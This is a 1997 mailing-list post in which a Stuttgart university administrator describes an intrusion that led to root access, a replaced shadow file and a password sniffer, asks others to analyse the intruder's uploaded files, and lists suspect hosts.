[Offtopic] Russian Hacker

Harald Hoyer (saturn@studbox.uni-stuttgart.de)
Thu, 02 Jan 1997 22:05:15 -0100


Hi,

excuse me for this offtopic, but I think this is also very
interesting to you (good programmers).

On Dec 30 we had a visit from someone from sampo.karelia.ru.
We don't know where he got the passwd of one of our users,
but ... shit happens.

The first thing he/she/it did was download two files named:
my_lib and my_library.so (attached).

Two days after that (main logs are cleared), he got the root-password.
Don't ask me how, it is a shadow system with /etc/shadow readonly for
root.

He/she/it installed a new /etc/shadow with himself as a user and
installed a tcp/ip-snooper to get more passwords.

NOW MY QUESTION IS HOW DID HE GET THE PASSWORD? Maybe with my_lib* ?
Could someone please have a look at these files and mail me his comments?

And beware of logins from these hosts:

sampo.karelia.ru
kftt-runnet.karelia.ru
www.ci.houston.tx.us
ashton.lib.dixie.edu
ferret-world.csc.peachnet.edu
gw.kppublish.ru

Best wishes for the new year,

Harald

-- 
Harald Hoyer  
saturn@studbox.uni-stuttgart.de 
http://saturnnet.wh.uni-stuttgart.de/~saturn
-------------------------------------------------------------------------
> Someone:
> Asking Linus to add such things in the kernel is as pertinent as asking 
> to still support 80286 CPU (IMHO).
We are working on it.
Alan Cox
